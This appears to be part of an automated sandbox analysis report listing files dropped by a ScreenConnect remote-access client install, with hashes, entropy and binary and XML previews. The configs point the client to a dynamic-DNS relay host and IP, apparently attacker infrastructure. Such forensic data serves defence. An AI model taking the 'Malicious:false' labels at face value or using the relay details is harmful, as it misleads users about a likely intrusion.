                                                                                                                                                                                                                SHA1:1CE8D8DD183C43ADB38D8F6DEFC525CC093D08EC
                                                                                                                                                                                                                SHA-256:7108F7790C144DCD4BF81E49BAE5924CC3D1050DDF697F9EAE06E2A1AD95EB37
                                                                                                                                                                                                                SHA-512:031B163839D00EBEC6D335E53CBACCD8ADB0A25417A67780BE91827C20DFD25D0CE84F37E114FD3F4D8D1A3A54A35A73088E0AB744863BF45812E61CEFE8826F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2..C.."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8..O..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6....(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.%...0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.t...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..0..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r..i.. .....PNG........IHDR...h...z........v....PLTE.w........j.N.......2...=IDATx....b.8..`'J..J....bdX'!.:..:...?..7...]~.RG..d\..z*.lK..62.6/v.....hg..w)!....ci.....).Fo.....*.{....S7...#.(*...GH...E4&.G.Q.l..N.......~..(.j....q..'..k@'...;h...(.D...~Q.t..8.uv.oT.E..j....c..*v..|..Y.:B...4y.Q$..Ed74......&5...!.u....Z.iP4..
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):50133
                                                                                                                                                                                                                Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):26722
                                                                                                                                                                                                                Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1970
                                                                                                                                                                                                                Entropy (8bit):4.690426481732819
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                                                                                                                                                                                MD5:2744E91BB44E575AD8E147E06F8199E3
                                                                                                                                                                                                                SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                                                                                                                                                                                SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                                                                                                                                                                                SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):563
                                                                                                                                                                                                                Entropy (8bit):5.039448776106875
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpvH/vXbAa3xT:2dL9hK6E46YP7vH
                                                                                                                                                                                                                MD5:94F2B125FF2AD83490DCE247338E06CB
                                                                                                                                                                                                                SHA1:30578C28C03869B8325298B547508DDAEC36E5BE
                                                                                                                                                                                                                SHA-256:57736985015312753A6998421628C976A736B9CECBAB5EFF4BD1877055A2C03D
                                                                                                                                                                                                                SHA-512:E6672F868F80EF633B40B591DA32376C52383947C7E1A39A352BD4A737641BC02E66BCF34CB8A06486EFAD202A35BA32348E0D4AC1F482253F8389C4F676F759
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>ttyuio.zapto.org=178.215.236.119-02%2f10%2f2024%2004%3a16%3a42</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):563
                                                                                                                                                                                                                Entropy (8bit):5.039448776106875
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpvH/vXbAa3xT:2dL9hK6E46YP7vH
                                                                                                                                                                                                                MD5:94F2B125FF2AD83490DCE247338E06CB
                                                                                                                                                                                                                SHA1:30578C28C03869B8325298B547508DDAEC36E5BE
                                                                                                                                                                                                                SHA-256:57736985015312753A6998421628C976A736B9CECBAB5EFF4BD1877055A2C03D
                                                                                                                                                                                                                SHA-512:E6672F868F80EF633B40B591DA32376C52383947C7E1A39A352BD4A737641BC02E66BCF34CB8A06486EFAD202A35BA32348E0D4AC1F482253F8389C4F676F759
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>ttyuio.zapto.org=178.215.236.119-02%2f10%2f2024%2004%3a16%3a42</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):68096
                                                                                                                                                                                                                Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1373
                                                                                                                                                                                                                Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                Size (bytes):1662
                                                                                                                                                                                                                Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):847
                                                                                                                                                                                                                Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (623), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):15016
                                                                                                                                                                                                                Entropy (8bit):3.8067087194552496
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:CjiqHzgjvUaujiqHzPMqo0D2E6jiqHzzE8jdLEv:YXCvU3XzMmD2EAXvJdA
                                                                                                                                                                                                                MD5:978815DD42CDCD3C24A7B2B5AB9194CC
                                                                                                                                                                                                                SHA1:48226FE4A42DD9FA35EE45EA83B68B3340927428
                                                                                                                                                                                                                SHA-256:94EAA1C961178C235D465A5C00201C104F533F2E9AF78C6253A6338BBD83E476
                                                                                                                                                                                                                SHA-512:F3FFC6339DDA68E38345646CBC045A4C76A5739C67BE65D12B67CCCC17BA872551144A3D14434E2D082940186150DBDA6303AF557AF143316032E73F27F8527F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.c.l.o.u.d.f.i.l.e.s.-.s.e.c.u.r.e...i.o./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.t.t.y.u.i.o...z.a.p.t.o...o.r.g.&.p.=.8.0.4.1.&.s.=.e.7.6.a.7.0.8.9.-.9.b.d.3.-.4.6.0.c.-.8.e.
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):242016
                                                                                                                                                                                                                Entropy (8bit):5.858471214140723
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:0FcfiVIfQZlENURlENURlENURlENURlENUcmt8vOvP:Oc26UCUCUCUCUh2cP
                                                                                                                                                                                                                MD5:D8259314C0A0D0B11E4979470E4B973A
                                                                                                                                                                                                                SHA1:552BDA7DE4DB0B4DC772C578664DCBDCC9E58D6C
                                                                                                                                                                                                                SHA-256:B8289C61E2C1A1076D4244823E71CD2D877FEA82504B45B0C80753F5BABD9E12
                                                                                                                                                                                                                SHA-512:47A93656BAAAE18242B930BD6F2574E6C62286D965142F2C7DF431B0754F92EE142BC4FD8CA719EB14EB40FE4EDAEB95DBB7ED7528A9B2CCAB34063FD887F3B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):197120
                                                                                                                                                                                                                Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1041
                                                                                                                                                                                                                Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                Malicious:false
